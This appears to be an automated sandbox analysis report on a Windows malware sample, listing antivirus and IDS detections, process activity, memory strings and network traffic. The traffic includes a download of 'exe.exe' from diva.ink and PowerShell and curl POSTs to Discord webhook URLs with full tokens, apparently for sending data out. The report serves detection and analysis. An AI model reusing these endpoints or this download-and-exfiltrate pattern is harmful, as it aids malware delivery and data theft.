C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6712, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline", ProcessId: 6704, ProcessName: csc.exe

Suricata IDS alerts
  • Timestamp: 2024-10-06T13:37:33.646580+0200, SID: 2019714, Severity: 2, Classtype: Potentially Bad Traffic, Source IP: 192.168.2.8, Source Port: 64901, Destination IP: 185.199.108.153, Destination Port: 443, Protocol: TCP

AV Detection

Source: C:\Users\Public\Documents\Secret Document\exe.exe, Avira: detection malicious, Label: TR/Agent.lsgui
Source: C:\Users\Public\Documents\Secret Document\exe.exe, ReversingLabs: Detection: 70%
Source: Yara match, File source: C:\Users\Public\Documents\Secret Document\exe.exe, type: DROPPED
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 97.6% probability
Source: C:\Users\Public\Documents\Secret Document\exe.exe, Joe Sandbox ML: detected
Source: unknown, HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.8:64892 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.8:64897 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 185.199.108.153:443 -> 192.168.2.8:64901 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.8:64913 version: TLS 1.2
        Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000014.00000002.2132008073.00000224BB954000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: softy.pdb9 source: powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb{ source: powershell.exe, 00000014.00000002.2136799854.00000224BBAF0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: tomation.pdb source: powershell.exe, 00000009.00000002.1493577612.000002699181D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1524477975.00000269AB862000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1526310397.00000269ABB8D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2132008073.00000224BB8AE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000023.00000002.2673504080.000002D2E06EA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdb source: powershell.exe, 00000014.00000002.2132008073.00000224BB880000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: n.pdb source: powershell.exe, 00000009.00000002.1526310397.00000269ABB99000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbu38 source: powershell.exe, 00000014.00000002.2132008073.00000224BB954000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32( source: powershell.exe, 00000014.00000002.1953599209.00000224A1939000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: 6?ll\mscorlib.pdb source: powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: softy.pdb3 source: powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.pdb source: powershell.exe, 00000009.00000002.1496227351.0000026994FB9000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.pdbhPM source: powershell.exe, 00000009.00000002.1496227351.0000026994FB9000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: ion.pdb source: powershell.exe, 00000009.00000002.1524477975.00000269AB862000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbQ*V source: powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.pdbneAutomation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dllmands.Utility.dllt.dll source: powershell.exe, 00000009.00000002.1493577612.000002699181D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: em.Core.pdbk source: powershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: em.Core.pdb source: powershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbi source: powershell.exe, 00000009.00000002.1524477975.00000269AB862000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ion.pdb71 source: powershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: *on.pdb source: powershell.exe, 00000009.00000002.1524477975.00000269AB862000.00000004.00000020.00020000.00000000.sdmp
        Source: global trafficHTTP traffic detected: GET /exe.exe HTTP/1.1Host: diva.inkConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
        Source: Joe Sandbox ViewIP Address: 162.159.128.233 162.159.128.233
        Source: Joe Sandbox ViewIP Address: 185.199.108.153 185.199.108.153
        Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
        Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:64901 -> 185.199.108.153:443
        Source: global trafficHTTP traffic detected: POST /api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: ptb.discord.comContent-Length: 50Expect: 100-continueConnection: Keep-Alive
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /exe.exe HTTP/1.1Host: diva.inkConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: discord.com
        Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
        Source: global trafficDNS traffic detected: DNS query: ptb.discord.com
        Source: global trafficDNS traffic detected: DNS query: api.msn.com
        Source: global trafficDNS traffic detected: DNS query: diva.ink
        Source: unknownHTTP traffic detected: POST /api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz HTTP/1.1Host: discord.comUser-Agent: curl/7.83.1Accept: */*Content-Type: application/jsonContent-Length: 47
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 06 Oct 2024 11:36:07 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2d2e4b4e83d711efbbb5069e833022f9; Expires=Fri, 05-Oct-2029 11:36:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1728214568x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YGklYx1d2cW8BhgkyRVfbOYioO2vcAIqF2jAmrfbgQ%2B2UkIwFApw7DcJAiHc4J6eu5ZqmbonDzDZEOHQXdTjyKnZrbUXYuAaPS7XyqtOxWKaV%2BUZ0MCGesKq2e9l"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2d2e4b4e83d711efbbb5069e833022f9cef3e9ced00fa7b64b4c1686e6ff1a63df6cc21685dcedc62ec80ba1cc5929de; Expires=Fri, 05-Oct-2029 11:36:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=b37bbe72c413031a900b56b1d31d11a902acd7e0-1728214567; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 06 Oct 2024 11:36:08 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2e072e0a83d711ef8c1ba6b9cfeb62f1; Expires=Fri, 05-Oct-2029 11:36:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1728214569x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sOoC3SBezCg0nU%2BOEXHjKZMPd4R86nMK2v7QN9Pkdfjq21IFcLAifYU2D%2BnK0og1p%2FKSJQL2b0ZQdQ09N%2BWhw5avZO39PrnzuD%2BfH93z7osICy9a6h%2FmZP4jcTni"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2e072e0a83d711ef8c1ba6b9cfeb62f149dd75b89a5720c855583c6a29207d0006d76d49577469e0cf5f2f0ca379ffa1; Expires=Fri, 05-Oct-2029 11:36:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=bb964afb29782512641559f220b160214513b907-1728214568; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 06 Oct 2024 11:37:28 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=5db2103e83d711efb9496aa08501a966; Expires=Fri, 05-Oct-2029 11:37:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1728214649x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LtjJdExVy97iaETFDYwF%2F7DxwZGf2Vm9Bpjw9FE3s3a114TFt%2BxXYNdNiRVrgkncYTVuXkLtFGihwfWwK7lMLkwLcCCQgQqodupcxuKxbzzYx3X6yZUyYnVfVuKOTAwSBw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=5db2103e83d711efb9496aa08501a9665f4224957175ab610e045a13edcb3f791b0e3e2b5c889874fe9ef19eba1a1711; Expires=Fri, 05-Oct-2029 11:37:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=4216abe66f60e6f26d03b5316b71ec33601d74bb-1728214648; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 06 Oct 2024 11:37:30 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=5f138d1883d711ef9a43b24ca2cdc774; Expires=Fri, 05-Oct-2029 11:37:30 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1728214652x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=19sInuO38Ar0dPAU27c3KDCtTqzB8lQk2%2FecDwtHb3Kpc6QhtSqbhu6RTGBXgn65K8opGlRi%2BPsDGdGtxRuiTcSqGjN6wQzsxCRXNtARTWY02wFf9uHr%2F3W0eS9DOn11yQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=5f138d1883d711ef9a43b24ca2cdc774fb28e2dbb8f9a4eb9da8c2268aeffa1bb73952ade3ca065bd126775ba035ce45; Expires=Fri, 05-Oct-2029 11:37:30 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=5c1c52db2546bb0b04da3053595ec57af65671bc-1728214650; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 06 Oct 2024 11:37:40 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=648e1e3e83d711efa1222e6bea697208; Expires=Fri, 05-Oct-2029 11:37:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1728214661x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DCWBk2%2FUnFbrwYkx1MryQh%2BIRQdTLum%2FZejWsAr6aiu3euwg1TXNnt33p8%2B2Fxlv68Hz4n56518HpsgA%2BTgJQ3yxaoMWIORbY9axWm2THY8PUanmVYnGmbvXuUzWavLtUw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=648e1e3e83d711efa1222e6bea69720871fa1048c683cd0b23181c93d19fe4facf90e24b0bfe98c28416ab86fcd5cb02; Expires=Fri, 05-Oct-2029 11:37:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=3e1b35420a45e4990d8b0aa7548cd31247594e2b-1728214660; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneSet-Cookie: _cfuvi
        Source: explorer.exe, 00000017.00000002.2709660093.0000000008F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: powershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
        Source: svchost.exe, 00000019.00000002.2704857982.000001774DCCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
        Source: explorer.exe, 00000017.00000002.2709660093.0000000008F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: explorer.exe, 00000017.00000002.2709660093.0000000008F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: svchost.exe, 00000019.00000003.2260956832.000001774F0B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
        Source: powershell.exe, 00000009.00000002.1519896951.00000269A3822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1519896951.00000269A36DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024781632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1602787494.00000247901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1602787494.000002479006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1639610296.000002640E430000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1718613317.000002641CC11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1718613317.000002641CADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1915213464.0000021AAC10A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1915213464.0000021AAC240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2116770833.00000224B38F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: explorer.exe, 00000017.00000002.2709660093.0000000008F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: powershell.exe, 00000014.00000002.1961641784.00000224A3AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000023.00000002.2398128595.000002D2C9A75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ptb.discord.com
        Source: svchost.exe, 00000019.00000002.2704265023.000001774DCC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumera
        Source: powershell.exe, 00000009.00000002.1496227351.0000026993671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1639610296.000002640CA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1789270547.0000021A9C091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1961641784.00000224A3881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2166565147.0000025C1B5CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 0000000E.00000002.1639610296.000002640DEEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: powershell.exe, 00000014.00000002.1961641784.00000224A3AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000015.00000002.2222057483.0000025C336DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
        Source: explorer.exe, 00000017.00000003.2339756407.000000000BC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cot
        Source: powershell.exe, 00000009.00000002.1496227351.0000026993671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1639610296.000002640CA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1789270547.0000021A9C091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1961641784.00000224A3881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2166565147.0000025C1B5CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2166565147.0000025C1B59A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: explorer.exe, 00000017.00000003.2618054008.000000000913A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306435911.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304478538.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2328373122.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2709660093.000000000913A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/Io.
        Source: explorer.exe, 00000017.00000003.2618054008.000000000913A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306435911.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304478538.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2328373122.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2709660093.000000000913A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/uo
        Source: explorer.exe, 00000017.00000003.2305382655.00000000091C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2709660093.000000000917D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306085985.00000000080B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 00000017.00000003.2618054008.000000000913A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306435911.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304478538.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2328373122.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2709660093.000000000913A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?Vm
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2705476793.00000000052BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 00000017.00000002.2709660093.0000000009128000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2618054008.0000000009128000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304478538.0000000009128000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306435911.0000000009128000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2328373122.0000000009128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
        Source: powershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: explorer.exe, 00000017.00000003.2304007048.0000000009148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
        Source: powershell.exe, 00000009.00000002.1493410501.0000026991744000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1292044762974785547/-sVDk3
        Source: csc.exe, 0000000A.00000003.1488501089.0000013616791000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1488254269.000001361678C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1488419687.000001361678C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000002.1488742165.0000013616792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7Eu
        Source: WMIC.exe, 00000004.00000002.1453877128.0000022707420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0be
        Source: curl.exe, 0000001C.00000002.2290720682.00000219E6A60000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001C.00000002.2287844080.00000219E6780000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2673504080.000002D2E0716000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2386798148.000002D2C6330000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTz
        Source: svchost.exe, 00000019.00000003.2260956832.000001774F121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
        Source: svchost.exe, 00000019.00000003.2260956832.000001774F0B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
